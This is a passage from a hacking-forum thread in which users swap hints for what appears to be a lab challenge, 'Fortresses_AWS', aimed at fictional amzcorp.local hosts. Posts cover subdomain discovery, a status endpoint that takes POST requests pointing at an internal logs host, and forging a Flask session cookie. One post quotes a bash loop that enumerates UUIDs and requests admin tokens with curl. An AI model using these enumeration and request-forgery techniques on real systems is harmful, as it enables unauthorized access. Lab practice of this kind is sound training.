Return to forum
Fortresses_AWS
by - Thursday, January 1, 1970 at 12:00 AM
Elite User
Elite
Posts: 132
Threads: 0
Joined: N/A
Reputation: 5

#11
July 13, 2022 at 7:42 PM
(July 13, 2022, 03:58 PM)teksius Wrote:
(July 13, 2022, 11:45 AM)fironeDerbert Wrote: How are we supposed to use the token ? Is it a cookie ? a loalStorage ?


In cookies: api_token
Does anybody able to edit user?


Hi, sorry to bother you but what page/api endpoit are we supposed to load with this cookie added ?
Reply
Elite User
Elite
Posts: 132
Threads: 0
Joined: N/A
Reputation: 5

#12
July 14, 2022 at 9:56 AM
Even with the cookie nothing changes... This page http://jobs.amzcorp.local/api/v4/logs/get still return "Unauthorized Access!"
Reply
Member
Member
Posts: 1
Threads: 0
Joined: N/A
Reputation: 0

#13
July 14, 2022 at 10:31 AM
Found: http://jobs.amzcorp.local/api/v4/status
{
  "site_status": [
    {
      "site": "amzcorp.local", 
      "status": "OK"
    }, 
    {
      "site": "jobs.amzcorp.local", 
      "status": "OK"
    }, 
    {
      "site": "services.amzcorp.local", 
      "status": "OK"
    }, 
    {
      "site": "cloud.amzcorp.local", 
      "status": "OK"
    }, 
    {
      "site": "inventory.amzcorp.local", 
      "status": "OK"
    }, 
    {
      "site": "workflow.amzcorp.local", 
      "status": "OK"
    }, 
    {
      "site": "company-support.amzcorp.local", 
      "status": "OK"
    }
  ]
}
Reply
Elite User
Elite
Posts: 132
Threads: 0
Joined: N/A
Reputation: 5

#14
July 14, 2022 at 8:28 PM
(July 14, 2022, 10:31 AM)kaerbannog Wrote: Found: http://jobs.amzcorp.local/api/v4/status
{
  "site_status": [
    {
      "site": "amzcorp.local", 
      "status": "OK"
    }, 
    {
      "site": "jobs.amzcorp.local", 
      "status": "OK"
    }, 
    {
      "site": "services.amzcorp.local", 
      "status": "OK"
    }, 
    {
      "site": "cloud.amzcorp.local", 
      "status": "OK"
    }, 
    {
      "site": "inventory.amzcorp.local", 
      "status": "OK"
    }, 
    {
      "site": "workflow.amzcorp.local", 
      "status": "OK"
    }, 
    {
      "site": "company-support.amzcorp.local", 
      "status": "OK"
    }
  ]
}

You can use the method POST on the status endpoint
Reply
Member
Member
Posts: 40
Threads: 0
Joined: N/A
Reputation: 2

#15
July 15, 2022 at 1:19 AM
Its a flask cookie. So I'm assuming we need to leak the flask secret somehow and then forge a cookie?
Reply
Member
Member
Posts: 23
Threads: 0
Joined: N/A
Reputation: 1

#16
July 15, 2022 at 1:30 AM
query the logs domain

{
"site": "http://logs.amzcorp.local/",
"url": "http://logs.amzcorp.local",
"scheme": ""
}
Reply
Member
Member
Posts: 40
Threads: 0
Joined: N/A
Reputation: 2

#17
July 15, 2022 at 1:34 AM
(July 15, 2022, 01:30 AM)mceye Wrote: query the logs domain

{
    "site": "http://logs.amzcorp.local/",
    "url": "http://logs.amzcorp.local",
    "scheme": ""
}


Where did you find that subdomain? I found jobs, cloud, workflow, company-support and inventory so far.
Reply
Member
Member
Posts: 24
Threads: 0
Joined: N/A
Reputation: 1

#18
July 15, 2022 at 2:33 AM
[quote="hacker1111" pid="146001" dateline="1657645911"][code]for i in {950..975}; do echo -n '{"get_token":"True","uuid":'$i',"username":"admin"}' | base64; done | xargs -I{} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"[/code][code]Early Access Flag[/code][/quote]possibly it will be easy, but I need to understand how and why :(
Reply
Member
Member
Posts: 23
Threads: 0
Joined: N/A
Reputation: 1

#19
July 15, 2022 at 2:36 AM
(July 15, 2022, 01:34 AM)ryzen Wrote:
(July 15, 2022, 01:30 AM)mceye Wrote: query the logs domain

{
    "site": "http://logs.amzcorp.local/",
    "url": "http://logs.amzcorp.local",
    "scheme": ""
}


Where did you find that subdomain? I found jobs, cloud, workflow, company-support and inventory so far.


function GetLogData() {
    var log_table = document.getElementById('log_table');
    const xhr = new XMLHttpRequest();

    xhr.open('GET', '/api/v4/logs/get');
    xhr.responseType = 'json';
    xhr.onload = function (e) {
        if (this.status == 200) {
            log_table.append(this.response['log']);
        } else {
            log_table.append("Error retrieving logs from logs.amzcorp.local");
        }
    };
    xhr.send();
}
Reply
Member
Member
Posts: 6
Threads: 0
Joined: N/A
Reputation: 0

#20
July 15, 2022 at 2:48 AM
(July 15, 2022, 02:36 AM)mceye Wrote:
(July 15, 2022, 01:34 AM)ryzen Wrote:
(July 15, 2022, 01:30 AM)mceye Wrote: query the logs domain

{
    "site": "http://logs.amzcorp.local/",
    "url": "http://logs.amzcorp.local",
    "scheme": ""
}


Where did you find that subdomain? I found jobs, cloud, workflow, company-support and inventory so far.


function GetLogData() {
    var log_table = document.getElementById('log_table');
    const xhr = new XMLHttpRequest();

    xhr.open('GET', '/api/v4/logs/get');
    xhr.responseType = 'json';
    xhr.onload = function (e) {
        if (this.status == 200) {
            log_table.append(this.response['log']);
        } else {
            log_table.append("Error retrieving logs from logs.amzcorp.local");
        }
    };
    xhr.send();
}


ive been getting unauthorized access everytime ive tried since last night, any idea what im doing wrong?
Reply


 Users viewing this thread: Fortresses_AWS: No users currently viewing.